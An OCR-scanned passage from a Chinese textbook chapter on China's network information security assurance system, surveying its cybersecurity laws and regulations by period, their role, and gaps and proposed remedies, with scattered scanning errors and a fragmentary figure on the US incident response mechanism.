211 网 络 信息 安全 保障 体系 的 总 体 情 况 
网 络 信息 安全 保障 体系 是 用 于 保障 互联 网 安全 的 政策 .机构 .技术 .产品 .经费 等 因素 
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的 集合 ,这 些 因 素 既 相 互 影响 ,又 相互 促进 ,共同 为 互联 网 安全 提供 有 力 保障 。 

近年 来 ,由 于 严峻 的 网 络 安全 形势 对 国家 提出 了 迫切 的 需求 ,我 国 网 络 信息 安全 保 
障 工作 取得 了 明显 的 成 效 ,包括 加 大 了 资金 投资 力度 ,建设 了 一 批 网 络 安全 基础 设施 ,加 
强 了 互联 网 信息 内 容 安 全 管理 ,不 断 完善 网 络 安全 方面 的 法 律 法 规 ,为 维护 国家 安全 与 
社会 稳定 、 保 障 和 促进 信息 化 建设 健康 发 展 发 挥 了 重要 作用 。 

但 我 国 网 络 信息 安全 保障 工作 相 比 于 发 达 国 家 起 步 较 晚 ,发 展 也 不 够 迅速 , 仍 存 在 
一 些 亟 待 解 决 的 问题 。 例 如 ,管理 与 技术 人 才 的 缺乏 ,技术 水 平整 体 相 对 落后 ,防护 水 平 
相对 较 低 .应 急 处 理 能 力 不 强 .产业 缺乏 核心 莞 争 力 、 网 络 安全 法 律 法 规 和 标准 不 完善 、 
全 社会 安全 意识 不 强 、 网 络 安全 管理 薄弱 等 。 


212 网 络 信息 安全 保障 体系 的 四 个 层次 与 两 个 支撑 


网 络 信息 安全 保障 体系 包括 四 个 层次 ,分 别 是 政策 法 规 . 组 织 机 构 .技术 产业 、 安 全 
基础 设施 。 网 络 信息 安全 保障 体系 还 包括 经 费 保 障 和 人 才 保 障 两 个 支撑 。 


213 政策 法 规 为 网 络 安全 提供 政策 支持 和 法 律 依据 


我 国 于 1994 年 与 国际 互联 网 全 面 对 接 ,也 是 从 1994 年 开始 陆续 发 布 一 系列 的 互联 
网 法 律 法 规 , 旨 在 通过 加 强 政策 法 规 建设 来 最 大 程度 地 消除 和 降低 影响 互联 网 安全 的 因 
素 。 我 国 网 络 安全 立法 体系 框架 分 为 四 个 层面 , 即 法 律 、 行 政法 规 、 地 方 性 法 规 与 规章 、 
规范 性 文件 。 法 律 是 指 由 全 国人 民 代 表 大 会 及 其 常务 委员 会 通过 的 法 律 规范 ,主要 有 
《宪法 兴 刑 法 兴 刑 事 诉讼 法 兴 保守 国家 秘密 法 兴 行 政 诉讼 法 兴国 家 赔偿 法 兴 人 民警 察 
法 兴 治 安 管理 处 罚 条 例 兴 国家 安全 法 兴 行 政 处 罚 法 兴 立 法 法 兴 中 华人 民 共 和 国电 子 签 
名 法 兴 全 国人 民 代表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 》 等 。 行 政法 规 是 指 国 
务 院 为 执行 宪法 和 法 律 而 制定 的 法 律 规范 ,主要 有 : 国务 院 令 147 号 (中 华人 民 共 和 国 计 
算 机 信息 系统 安全 保护 条 例 》、 国 务 院 令 195 号 (中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联 
网 管理 暂行 规定 》、 公 安 部 令 33 号 (计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》、 国 务 
院 令 273 号 (商用 密码 管理 条 例 》、 国 务 院 令 291 号 (中 华人 民 共 和 国电 信条 例 》、 国 务 院 
令 292 号 (互联 网 信息 服务 管理 办 法 )、 国 务 院 令 339 号 (计算 机 软件 保护 条 例 ) 等 。 规 章 
是 指 国务 院 各 部 委 根据 法 律 和 国务 院 行政 法 规 , 在 本 部 门 的 权限 范围 内 制定 的 法 律 规 
范 , 以 及 省 自治 区 直辖 市 和 较 大 市 的 人 民政 府 根据 法 律 、 行 政法 规 和 本 省 .自治 区 、 直 
辖 市 的 地 方 性 法 规制 定 的 法 律 规范 。 规 范 性 文件 是 各 级 机 关 、 团 体 、 组 织 制 发 的 各 类 文 
件 中 最 主要 的 一 类 , 因 其 内 容 具 有 约束 和 规范 人 们 行为 的 性 质 , 故 名 称 为 规范 性 文件 , 俗 
称 “ 红 头 文件 ”。 主 要 的 规章 及 规范 性 文件 有 : 公安 部 下 发 的 (计算 机 信息 系统 安全 专用 
产品 检测 和 销售 许可 证 管理 办 法 兴 计 算 机 病毒 防治 管理 办 法 兴 金 融 机 构 计算 机 信息 系 
统 安全 保护 工作 暂行 规定 兴 关 于 开展 计算 机 安全 员 培 训 工 作 的 通知 》 等 ;信息 产业 部 下 
发 的 (互联 网 电子 公告 服务 管理 规定 兴 软 件 产品 管理 办 法 兴 计算 机 信息 系统 集成 资质 管 
理 办 法 兴国 际 通行 出 人口 局 管理 办 法 兴国 际 通行 设施 建设 管理 规定 兴 中 国 互联 网 络 域 
名 管理 办 法 闪电 信和 网 间 互 联 管理 暂行 规定 ) 等 ;国家 保密 局 下 发 的 (计算 机 信息 系统 保密 
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管理 暂行 规定 兴 计算 机 信息 系统 国际 联网 保密 管理 规定 兴 涉 及 国家 秘密 的 通信 、 办 公 自 
动 化 和 计算 机 信息 系统 审批 暂行 办 法 兴 涉 密 计 算 机 信息 系统 建设 资质 审查 和 管理 暂行 
办 法 兴 关 于 加 强 政府 上 网 信息 保密 管理 的 通知 ?等 :地方 规 章 和 规范 性 文件 包括 《广东 省 
计算 机 信息 系统 安全 保护 管理 规定 兴 广 东 省 计算 机 信息 系统 安全 保护 管理 规定 实施 细 
则 兴 四 川 省 计算 机 信息 系统 安全 保护 管理 办 法 》 等 。 


1. 网 络 安全 政策 法 规 发 展 历程 


我 国 互 联网 安全 政策 法 规 建设 大 致 可 以 分 为 三 个 阶段 : 初步 建设 阶段 ,快速 发 展 阶 
段 .综合 保障 阶段 。 

1) 初步 建设 阶段 

初步 建设 阶段 指 的 是 1994 一 1999 年 。 这 一 阶段 我 国 互 联网 刚刚 起 步 ,普及 率 低 , 各 
种 安全 威胁 相对 较 少 且 威 胁 等 级 不 高 。 但 计算 机 信息 网 络 国际 联网 后 带 来 的 一 系列 问 
题 ,例如 ,计算 机 病毒 防治 ,计算 机 信息 系统 的 安全 防护 等 ,已 经 引起 重视 。 该 阶段 的 政 
策 法 规 确立 了 一 些 基 本 的 管理 制度 ,但 相互 之 间 关 联 性 较 少 , 数 量 也 不 多 ,还 没有 形成 科 
学 有效 的 体系 。 该 阶段 政策 法 规 主要 涉及 三 方面 内 容 : 一 是 我 国 实现 与 国际 互联 网 连 
接 后 ,对 互联 单位 、 接 入 单位 及 使 用 计算 机 信息 网 络 国际 联网 的 法 人 和 其 他 组 织 的 管理 
问题 ;二 是 对 计算 机 信息 学 系统 尤其 是 国家 事务 ,经济 建 设 . 国 防 建 设 等 重要 领域 系统 的 
安全 保护 问题 ;三 是 商用 密码 及 相关 产品 的 管理 问题 。 该 阶段 我 国 主要 的 政策 法 规 
如 下 。 

(1)《 中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》。1994 年 2 月 18 日 中 华人 民 
共和 国 国务 院 令 第 147 号 发 布 ,这 是 我 国 第 一 部 有 关 互 联网 安全 的 行政 法 规 。 该 法 规 重 
点 关注 互联 网 发 展 的 初期 ,以 保护 计算 机 信息 系统 安全 ,促进 计算 机 应 用 与 发 展 为 目的 。 

(2)《 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 》。1996 年 2 月 1 日 
国务 院 令 第 195 号 发 布 ,1997 年 5 月 20 日 (国务 院 关 于 修改 二 中 华人 民 共 和 国 计 算 机 信 
息 网 络 国 际 联网 管理 暂行 规定 二 的 决定 ) 修 正 。 这 部 行政 法 规 重 点 关注 的 是 计算 机 信息 
网 络 国 际 联网 的 各 项 管理 问题 ,目的 是 加 强 对 计算 机 信息 网 络 国际 联网 的 管理 ,保障 国 
际 计算 机 信息 网 络 的 健康 发 展 。 

(3)《 计 算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 》。 该 办 法 是 由 中 华人 民 共 和 国 国 
务 院 于 1997 年 12 月 11 日 批准 ,公安 部 于 1997 年 12 月 16 日 公安 部 令 ( 第 33 号 ) 发 布 ， 
于 1997 年 12 月 30 日 实施 。 该 办 法 首次 明确 禁止 利用 互联 网 制作 、 复 制 、 查 阅 和 传播 9 
种 违法 信息 ,要 求 任何 单位 和 个 人 不 得 从 事 和 危害 计算 机 信息 网 络 安全 的 活动 ,为 我 国 互 
联网 内 容 安全 和 网 络 安全 管理 奠定 了 重要 基础 。 

(4)《 中 华人 民 共 和 国 刑法 》。 随 着 互联 网 的 快速 发 展 ,计算 机 犯罪 成 为 一 种 新 的 趋 
势 , 尤 其 是 网 络 诈骗 .网 络 色情 犯罪 等 。 为 了 加 大 对 网 络 犯罪 的 打击 力度 ,1997 年 刑法 修 
正 时 设立 了 与 计算 机 犯罪 相关 的 罪名 。 

(5)《 商 用 密码 管理 政策 及 相关 条 例 》。 商 用 密码 技术 在 维护 互联 网 安全 乃至 国家 安 
全 中 发 挥 着 重要 作用 。 因 此 我 国 决 定 在 不 涉及 国家 秘密 的 信息 使 用 密码 技术 的 情况 下 
大 力 发 展商 用 密码 ,并 确定 了 一 系列 商用 密码 管理 原则 。1999 年 ,为 了 加 强 商用 密码 管 
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理 , 保 护 信 息 安 全 ,保护 公民 和 组 织 的 合法 权益 ,维护 国家 的 安全 和 利益 ,制定 了 《商用 密 
码 管理 条 例 》.《 商 用 密码 管理 条 例 》 为 中 华人 民 共 和 国 国 务 院 令 第 273 号 , 自 1999 年 10 
月 7 日 发 布 之 日 起 实施 。 这 个 条 例 标志 着 我 国 商用 密码 的 使 用 和 管理 步 人 了 法 治 轨道 。 

2) 快速 发 展 阶段 

快速 发 展 阶段 指 的 是 2000 一 2002 年 。2000 一 2002 年 是 中 国 互联 网 快速 发 展 的 阶 
段 , 随 着 计算 机 与 互联 网 的 慢 慢 普及 ,利用 互联 网 制作 、 复 制 、 发 布 .传播 有 害 信息 ,以 及 
实施 网 络 违法 犯罪 活动 日 益 增多 。1998 年 侦查 计算 机 违法 犯罪 案件 仅 百 余 起 ,而 2001 
年 已 上 升 到 4000 多 起 。 其 中 90% 以 上 案件 涉及 网 络 。 网 络 安全 威胁 范围 更 广 , 影 响 更 
大 ,不 仅 损害 了 广大 网 民 的 利益 ,还 对 国家 安全 构成 威胁 。 该 阶段 法 律 法 规 主 要 以 规范 
互联 网 信息 内 容 为 目的 ,形式 上 以 立法 为 主 ,立法 层级 较 高 ,法 律 \ 行 政法 规 和 部 门 规章 
所 占 比 例 较 高 ,基本 确定 了 我 国 互 联网 信息 内 容 管 理 的 总 体 框架 。 此 阶段 政策 法 规 建设 
主要 涉及 三 方面 内 容 : 一 是 互联 网 信息 服务 管理 ,对 利用 互联 网 向 用 户 提供 信息 的 行为 
规定 了 管理 制度 和 措施 ;二 是 对 利用 互联 网 实施 的 违法 犯罪 行为 作出 规定 ;三 是 对 计算 
机 软件 、 集 成 电路 布 图 涉及 的 知识 产权 保护 作出 规定 。 该 阶段 我 国 主要 的 政策 法 规 
如 下 。 

(1)《 全 国人 民 代 表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 》。2000 年 12 月 28 
日 ,第 九 届 全 国人 民 代 表 大 会 常务 委员 会 第 十 九 次 会 议 通 过 了 该 决定 。2000 年 ,我 国 的 
互联 网 ,在 国家 大 力 倡导 和 积极 推动 下 ,在 经 济 建设 和 各 项 事业 中 得 到 日 益 广泛 的 应 用 ， 
使 人 们 的 生产 .工作 ,学习 和 生活 方式 已 经 开始 并 将 继续 发 生 深刻 的 变化 ,对 于 加 快 我 国 
国民 经 济 .科学 技术 的 发 展 和 社会 服务 信息 化 进程 具有 重要 作用 。 同 时 ,如 何 保障 互联 
网 的 运行 安全 和 信息 安全 问题 已 经 引起 全 社会 的 普遍 关注 。 为 了 兴 利 除 刺 ,促进 我 国 互 
联网 的 健康 发 展 ,维护 国家 安全 和 社会 公共 利益 ,保护 个 人 、 法 人 和 其 他 组 织 的 合法 权 
益 , 全 国人 民 代表 大 会 常务 委员 会 针对 五 类 利用 互联 网 实施 的 违法 犯罪 行为 作出 规定 ， 
并 要 求 从 事 互联 网 业务 的 单位 要 采取 措施 ,停止 传输 有 害 信 息 ,及 时 向 有 关机 关 报 告 。 

(2)《 互 联网 信息 服务 管理 办 法 )。 该 办 法 是 我 国 互 联网 管理 的 基础 性 法 规 ,为 了 规 
范 互 联网 信息 服务 活动 ,促进 互联 网 信息 服务 健康 有 序 发 展 ,经 2000 年 9 月 20 日 中 华人 
民 共 和 国 国务 院 第 31 次 常务 会 议 通过 ,2000 年 9 月 25 日 公布 施行 。 该 (办 法 ) 共 二 十 七 
条 , 自 公 布 之 日 起 施行 。 该 办 法 从 规范 互联 网 信息 服务 、 加 强行 业 管理 角度 出 发 ,规定 了 
经 营 性 和 非 经 营 性 互联 网 信息 服务 的 许可 和 备案 制度 ,以 及 新 闻 、 出 版 .教育 等 几 类 特殊 
互联 网 信息 服务 审批 制度 。 

(3)《 中 华人 民 共 和 国电 信条 例 》。 该 条 例 于 2000 年 9 月 20 日 国务 院 第 31 次 常务 
会 议 通 过 。 这 是 我 国 第 一 部 有 关 电 信 业 的 综合 性 行政 法 规 , 结 束 了 我 国电 信 业 基本 上 无 
法 可 依 的 状态 ,标志 着 我 国电 信 业 的 改革 与 发 展 进 入 了 一 个 新 的 历史 阶段 。 该 条 例 确立 
了 我 国电 信行 业 监 管 的 八 项 重要 制度 ,其 确立 的 电信 安全 保障 制度 对 于 维护 通信 网 络 与 
信息 安全 意义 重大 。 

(4)《 集 成 电路 布 图 设计 保护 条 例 》。 该 条 例 于 2001 年 3 月 28 日 国务 院 第 36 次 常 
务 会 议 通过 , 自 2001 年 10 月 1 日 起 施行 。 该 条 例 是 为 了 保护 集成 电路 布 图 设计 专 有 权 ， 
鼓励 集成 电路 技术 的 创新 ,促进 科学 技术 的 发 展 。 这 也 是 我 国 关 于 集成 电路 知识 产权 保 
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护 的 一 部 重要 行政 法 规 。 该 条 例 标志 着 我 国 基 本 建立 起 了 集成 电路 布 图 设计 保护 专 有 
权 的 保护 体系 。 

(5)《 计 算 机 软件 保护 条 例 》。 该 条 例 于 2001 年 12 月 20 日 以 中 华人 民 共 和 国 国务 
院 令 第 339 号 公布 。 这 是 我 国 关于 计算 机 软件 著作 权 保护 的 一 部 重要 行政 法 规 。 主 要 
是 为 了 保护 计算 机 软件 著作 权 人 的 权益 ,调整 计算 机 软件 在 开发 ,传播 和 使 用 中 发 生 的 
利益 关系 ,鼓励 计算 机 软件 的 开发 与 应 用 ,促进 软件 产业 和 国民 经 济 信息 化 的 发 展 。 该 
条 例 标志 着 我 国 基本 建立 起 了 计算 机 软件 著作 权 保 护 体系 。 

3) 综合 保障 阶段 

综合 保障 阶段 指 的 是 2003 年 至 今 。 此 阶段 的 核心 是 (国家 信息 化 领导 小 组 关于 加 
强 信 息 安 全 保障 工作 的 意见 ) 的 出 台 。 该 意见 确立 了 我 国信 息 安 全 保障 体系 的 基本 构 
成 ,明确 了 我 国信 息 安 全 保障 工作 的 指导 方针 、 基 本 原则 和 主要 任务 ;此 后 我 国 互联 网 政 
策 法 规 建设 开始 围绕 等 级 保护 、 网 络 监控 、 风 险 评 估 , 信 息 产业 发 展 等 信息 安全 保障 工作 
展开 。 此 阶段 互联 网 安全 政策 的 制定 和 立法 工作 并 重 ,针对 新 情况 、 新 问题 做 了 规定 。 
立法 上 经 过 法 律 法 规 数量 不 多 ,但 较 低层 次 的 部 门 规章 等 立法 较 频 繁 ,数量 多 ,内 容 丰 
富 。 总 体 来 看 ,此 阶段 我 国政 策 法 规 建设 针对 性 较 强 、 目 标明 确 , 已 经 初步 构建 起 我 国 互 
联网 安全 政策 法 规 体 系 。 该 阶段 我 国 主要 的 政策 法 规 如 下 。 

(1)《 国 家 信息 化 领导 小 组 关于 加 强 信息 安全 保障 工作 的 意见 》。 这 是 我 国信 息 安全 
保障 体系 建设 的 总 体 性 文件 。 该 意见 确立 了 以 信息 安全 法 律 法 规 、 组 织 管理 技术 保障 、 

台 和 安全 基础 设施 “四 个 层次 ”经 费 和 人 才 “ 两 个 保障 ”为 核心 的 信息 安全 保障 体系 ， 
提出 了 加 强 信息 安全 保障 工作 的 总 体 要 求 和 主要 原则 ,明确 了 实行 信息 安全 等 级 保护 、 
加 强 以 密码 技术 为 基础 的 信息 保护 和 网 络 信任 体系 建设 等 主要 任务 ,在 我 国信 息 安全 保 
障 体系 建设 中 发 挥 着 重要 的 纲领 性 作用 。 

(2)《 国 务 院 关于 大 力 推进 信息 化 发 展 和 切实 保障 信息 安全 的 若干 意见 》。2012 年 6 
月 28 日 ,国务 院 印发 《国务院 关于 大 力 推进 信息 化 发 展 和 切实 保障 信息 安全 的 若干 意 
见 》, 旨 在 大 力 推进 信息 化 发 展 ,切实 保障 信息 安全 。 该 意见 提出 了 确保 重要 信息 系统 和 
基础 信息 网 络 安全 .加强 政府 和 涉 密 信息 系统 安全 管理 等 主要 任务 ,对 于 今后 的 信息 安 
全 工作 具有 重要 意义 。 

(3)《 中 华人 民 共 和 国 刑法 (修正 案 )》。2009 年 ,针对 原 有 法 律 规定 因 计算 机 犯罪 呈 
现 出 的 新 特征 导致 难以 对 计算 机 犯罪 进行 有 效 打击 ,刑法 修正 案 中 将 一 系列 行为 规定 为 
犯罪 ,进一步 完善 了 我 国 网 络 犯 罪 立 法 。 

(4)《 中 华人 民 共 和 国电 子 签名 法 》。 该 法 由 中 华人 民 共 和 国 第 十 届 全 国人 民 代 表 大 
会 常务 委员 会 第 十 一 次 会 议 于 2004 年 8 月 28 日 通过 。 该 法 被 称 为 “中 国 首部 真正 意义 
上 的 信息 化 法 律 ”, 自 此 电子 签名 与 传统 手写 签名 和 盖 章 具有 同等 的 法 律 效力 。 这 部 法 
律 是 我 国 推进 电子 商务 发 展 , 扫 除 电 子 商 务 发 展 障 碍 的 重要 步骤 , 极 大 地 促进 电子 商务 
在 我 国 的 快速 发 展 。 

(5)《 信 息 网 络 传播 权 保 护 条 例 》。 该 条 例 于 2006 年 5 月 18 日 以 中 华人 民 共 和 国 国 
务 院 令 第 468 号 公布 。 这 是 我 国 调整 和 规范 网 络 著作 权 关 系 的 一 部 重要 行政 法 规 。 其 
主要 目的 是 为 保护 著作 权 人 、 表 演 者 、 录 音 录 像 制作 者 的 信息 网 络 传播 权 ,鼓励 有 益 于 社 
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会 主义 精神 文明 物质 文 明 建设 作品 的 创作 和 传播 。 该 条 例 规 定 了 信息 网 络 传播 作品 的 
免费 试用 .法定 许可 等 制度 ,完善 细 化 了 《著作 权 法 》 的 相关 内 容 , 对 加 强 网 络 著作 权 保 护 
具有 重要 意义 。 

(6)《 全 国人 民 代 表 大 会 常务 委员 会 关于 加 强 网 络 信息 保护 的 决定 》。 该 决定 于 
2012 年 12 月 28 日 第 十 一 届 全 国人 民 代表 大 会 常务 委员 会 第 三 十 次 会 议 通 过 。 其 主要 
目的 是 为 了 保护 网 络 信息 安全 ,保障 公民 、 法 人 和 其 他 组 织 的 合法 权益 ,维护 国家 安全 和 
社会 公共 利益 。 这 也 是 我 国 第 一 部 个 人 信息 保护 法 案 , 标 志 着 我 国 个 人 信息 保护 进入 了 
有 法 可 依 的 时 代 , 解 决 了 我 国 网 络 信息 安全 立法 之 后 的 问题 ,对 进一步 促进 我 国 互联 网 
健康 有 序 发 展 具有 重要 意义 。 


2. 网 络 安全 政策 法 规 的 主要 作用 


互联 网 安全 战略 等 政策 是 一 个 国家 开展 网 络 信息 安全 保障 工作 顶层 设计 的 重要 组 
成 部 分 。2011 年 ,美国 总 统 奥巴马 发 布 4 网 络 空间 国际 战略 》, 第 一 次 提出 当 网 络 受到 攻 
击 以 后 可 以 用 军事 手段 进行 反击 ,这 引起 各 国 的 高 度 重 视 。 从 全 球 范围 来 看 ,信息 化 、 网 
络 化 对 经 济 ,政治 .社会 等 各 领域 的 渗透 .融合 趋势 越 来 越 明 显 ,成 为 推动 经 济 社会 转型 ， 
实现 可 持续 发 展 ,提升 一 个 国家 综合 竞争 力 的 强大 动力 。 网 络 空 间 已 经 成 为 继 陆 、 海 、 
空 .天 之 后 的 第 五 大 主权 领域 空间 ,也 是 国际 战略 在 军事 领域 的 演进 。 这 对 我 国 网 络 安 
全 提出 了 严峻 的 挑战 ,我 们 应 积极 应 对 ,加 快 建设 我 国 网 络 安全 保障 体系 ,捍卫 我 国 网 络 
安全 国家 主权 。 

互联 网 安全 政策 为 网 络 信息 安全 保障 特定 工作 提供 支持 。 影 响 互 联网 安全 的 因素 
有 很 多 ,有 必要 制定 专门 政策 应 对 动态 变化 的 互联 网 风险 。 例 如 ,网 络 安全 发 展 的 热 
点 一 一 云 计算 安全 、 大 数据 安全 ,移动 互联 网 安全 ,金融 领域 互联 网 安全 等 ,有 必要 制定 
专门 的 扶持 政策 ,集中 资源 ,加 强 技 术 研 发 和 产业 布局 。 

法 律 规章 为 互联 网 安全 提供 依据 和 准绳 ,做 到 有 法 可 依 、 依 法 治 网 ,维护 网 络 安全 。 
互联 网 发 展 十 分 迅速 ,法律 规章 应 随 着 环境 的 变化 不 断 地 更 新 迭代 才能 适应 当下 的 环 
境 , 才 能 满足 对 安全 的 高 要 求 。 针 对 关键 信息 基础 设施 如 何 保护 、 信 息 数 据 是 否 可 以 跨 
境 流 动 ,大 数据 时 代 如 何 保护 网 络 隐私 、 云 计算 网 络 安全 风险 防范 等 方面 有 必要 制定 互 
联网 安全 法 规 , 明 确 互联 网 威胁 网络 犯罪 等 概念 ,维护 互联 网 的 稳定 与 和 谐 , 加 强 对 网 
络 犯罪 的 威慑 。 


3. 网 络 安全 政策 法 规 建 设 中 的 问题 及 对 策 


1) 网 络 安全 政策 法 规 建设 中 的 问题 

(1) 网 络 安全 立法 相对 滞后 且 存在 诸多 空白 。 互 联网 是 一 个 发 展 十 分 迅速 的 新 生 事 
物 ,而 立法 是 一 个 综合 的 系统 工程 。 由 于 安全 威胁 的 迅速 发 展 与 泛 化 ,新 的 安全 威胁 层 
出 不 穷 ,部 分 原 有 的 政策 法 规 已 经 无 法 对 新 的 安全 威胁 做 出 合理 有 效 的 规范 。 我 国 现行 
立法 尤其 是 法 律 法 规 多 产生 于 2005 年 前 ,目前 互联 网 安全 形势 已 经 发 生 巨 大 的 变化 , 旧 
的 法 律 法 规 难 以 全 面 反映 近年 来 新 技术 创新 应 用 环境 下 的 安全 威胁 及 其 应 对 用 户 权益 
保护 等 需求 ,未 经 变化 与 修订 的 政策 法 规 甚 至 存在 着 明显 的 漏洞 与 缺陷 。 例 如 , 早 在 
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2005 年 ,有 关 专 家 就 完成 了 《中 华人 民 共 和 国 个 人 信息 保护 法 (专家 建议 稿 ) 及 立法 研究 
报告 》。2008 年 ,《 个 人 信息 保护 法 ) 草 案 就 呈 交 国务 院 了 ,然而 此 法 至 今 未 予 出 台 。 反 观 
互联 网 信息 技术 比较 发 达 ,法律 属 于 普通 法 系 的 美国 ,仍然 可 以 找到 诸多 关于 互联 网 个 
人 信息 保护 的 单行 法 。 例 如 ,1986 年 颁布 的 (电子 通信 隐私 法 》; 1997 年 颁布 的 (联邦 互 
联网 隐私 保护 法 兴 数 字 隐 私法 》;1998 年 颁布 的 (儿童 在 线 隐私 保护 法 ) 等 《健康 保险 流 
通 和 责任 法 案 兴 格 翰 姆 一 布 莱 利 法 》 还 对 医疗 数据 收集 ,金融 机 构 数据 共享 方面 进行 了 
法 律 约束 ,还 积极 推行 行业 自律 与 立法 规范 相 结 合 的 安全 港 模式 。 这 些 专门 针对 互联 网 
个 人 信息 安全 的 法 律 和 行动 .较为 全 面 地 保护 了 公民 的 互联 网 信息 安全 。 当 然 ,“9，11” 
事件 发 生 后 《美国 爱国 者 法 案 ) 以 防止 恺 怖 主义 的 名 义 ,扩张 了 美国 警察 机 关 的 权限 , 警 
察 机 关 有 权 搜 索 电话 .电子 邮件 通信 、 医 疗 、 财 务 和 其 他 种 类 的 记录 , 某 种 程度 构成 了 对 
个 人 信息 安全 的 威胁 。 

(2) 网 络 安全 立法 层级 低 , 权 威 性 不 足 。 目 前 网 络 安全 领域 的 立法 除了 《全 国人 大 常 
委 会 关于 维护 互联 网 安全 的 决定 欠 全 国人 大 常委 会 关于 加 强 网 络 信息 保护 的 决定 》 和 几 
部 行政 法 规 以 外 ,其 他 大 多 是 部 门 规章 甚至 是 一 般 规范 性 文件 ,如 信息 安全 等 级 保护 的 
具体 规定 均 在 部 门 规章 中 。 一 旦 出 现 需 要 高 位 阶 法 律 作 为 依据 的 情况 , 现 有 立法 权威 性 
明显 不 足 , 影 响 其 效力 和 有 效 性 。 同 时 ,部 门 规章 为 主 的 立法 格局 ,也 导致 部 门 各 自 为 
政 , 缺 乏 全 盘 规 划 , 顾 此 失 彼 ,制度 之 间 缺 乏 协 调 , 屡 屡 出 现 九龙 治水 现象 。 总 体 来 看 , 互 
联网 安全 法 律 法 规 系统 性 较 差 , 立 法 相对 分 散 , 且 存在 诸多 空白 。 

(3) 网 络 安全 顶层 设计 和 战略 规划 度 不 够 。 当 前 ,互联 网 已 经 全 面 渗 透 到 政治 、 经 
济 ,社会 ,文化 和 军事 等 各 个 领域 ,国家 对 网 络 空间 主权 领域 的 争夺 ,既是 技术 产业 等 方 
面 的 竞争 ,又 是 国家 战略 的 较量 。 尽 管 党 中 央 、 国 务 院 对 网 络 安全 高 度 重视 ,但 还 是 缺乏 
明确 完善 的 顶层 设计 和 战略 规划 。 目 前 ,我 国 对 于 互联 网 安全 的 战略 性 、 前 上 脆性 和 全 局 
性 的 研究 还 不 够 深入 ,缺乏 对 互联 网 安全 的 顶层 设计 和 整体 部 署 。 比 如 许多 欧美 国家 ， 
大 部 分 都 有 一 套 完整 的 互联 网 安全 机 制 , 与 之 相 比 ,我 国 还 有 许多 不 足 。 美 国 网 络 安全 
实施 机 制 如 图 2. 1 所 示 。 

2) 网 络 安全 政策 法 规 建设 应 有 的 对 策 

针对 网 络 安全 政策 法 规 建设 中 的 问题 ,有 如 下 几 点 对 策 。 

(1) 加 强 网 络 安全 立法 规划 和 顶层 设计 。 立 法 在 网 络 安全 保障 中 起 到 了 非常 重要 的 
作用 ,我 国 对 于 网 络 安全 立法 的 重视 程度 逐年 上 升 。 虽 然 目前 我 国 已 经 出 台 了 一 些 互联 
网 安全 法 律 法 规 , 但 总 体 看 来 立法 进程 尤其 是 效力 层级 较 高 的 法 律 法 规制 定 相 对 较 慢 。 
这 有 多 方面 的 因素 ,例如 ,网 络 安全 问题 相对 较为 复杂 技术 和 管理 方面 难度 较 大 等 。 对 
此 应 紧 跟 互 联网 技术 与 应 用 的 发 展 趋势 ,对 网 络 安全 问题 深入 研究 ,调研 立法 需求 ,确定 
网 络 安全 立法 的 总 体 定 位 与 阶段 性 目标 ,确定 立法 优先 级 ,合理 分 配 立 法 资源 ,建立 内 容 
全 面 . 协 调 有 序 的 互联 网 安全 法 律 法 规 体系 。 

(2) 加 快 重点 领域 互联 网 安全 立法 工作 。2012 年 ,国务 院 发 布 (关于 大 力 推 进 信息 
化 发 展 和 切实 保障 信息 安全 的 若干 意见 》, 要 求 能 源 、 交 通 、 金 融 等 领域 涉及 国计民生 的 
重要 信息 系统 和 电信 网 .广播 电视 网 .互联 网 等 基础 信息 网 络 , 要 同步 规划 、 同 步 建设 、 同 
步 运 行 安全 防护 设施 ,强化 技术 防范 ,严格 安全 管理 ,切实 提高 防 攻 击 、 防 算 改 、 防 病毒 、 
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Mi:s 


国家 应 急 
响应 架构 
支持 功能 附件 2: 通信 
事故 和 网 络 事故 


国家 网 络 事故 响应 计划 
* 统 一 协调 小 组 
* 事 故 管理 分 队 


家 基础 设施 保护 计划 
(关键 基础 设施 各 分 部 门 的 网 络 安全 实施 计划 ) 


防 部 网 络 事故 民事 支持 计划 


各 个 机 构 的 网 络 安全 实施 计划 


2.1 美国 网 络 安全 实施 机 制 


防 瘫 痪 、 防 窃 密 能 力 。 不 但 这 些 领 域 ,大 数据 安全 , 云 计算 安全 也 是 目前 的 热点 。 因 此 应 
在 加 强 现 有 立法 评估 的 同时 ,加 快 重点 领域 互联 网 安全 立法 工作 。 建 立 由 各 部 门 参与 的 
评估 小 组 ,评估 现 有 法 律 法 规 对 网 络 安全 的 适用 性 ,并 通过 出 台 立 法 解释 ,司法 解释 和 判 
例 等 形式 增强 现 有 法 律 的 适用 性 。 针 对 热点 领域 加 强 立 法 ,明确 网 络 主体 应 当 承 担 的 法 
律 责任 和 义务 ,清晰 划分 网 络 安全 主管 部 门 职责 ,推动 出 台 具 有 操作 性 的 细 化 规定 ,做 好 
部 门 间 的 衔接 。 

(3) 加 快 制定 适合 我 国 国情 的 网 络 安全 战略 。 在 全 新 的 态势 下 ,有 效 地 构建 国家 网 
络 安全 战略 ,必须 符合 以 网 络 技术 及 其 应 用 为 代表 的 生产 力 发 展 的 趋势 和 方向 ,也 要 符 
合 当下 时 空 环境 中 由 国家 、 非 政府 组 织 及 其 构建 的 跨国 活动 分 子 网 络 以 及 个 人 所 共同 型 
塑 的 国际 结构 要 求 ,还 必须 契合 由 国家 长 期 战略 利益 所 决定 的 大 战略 的 整体 要 求 。 我 国 
应 在 全 面 评估 当前 网 络 安全 各 项 工作 基础 上 ,研究 制定 符合 我 国 国情 的 网 络 安全 战略 ， 
深入 分 析 我 国 互联 网 安全 形势 和 主要 问题 ,明确 网 络 安全 战略 定位 .思路 和 重点 任务 , 形 
成 一 种 全 新 的 国家 网 络 安全 观 。 


214 组 织 机 构 为 互联 网 安全 提供 组 织 保证 和 管理 支撑 
组 织 机 构 为 网 络 信息 安全 提供 顶层 规划 和 管理 保障 。 我 国 现行 的 信息 安全 管理 体 
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系 实行 的 是 集权 控制 和 全 国 统一 规范 模式 ,从 中 央 到 地 方 的 垂直 归口 管理 和 分 层 管理 相 
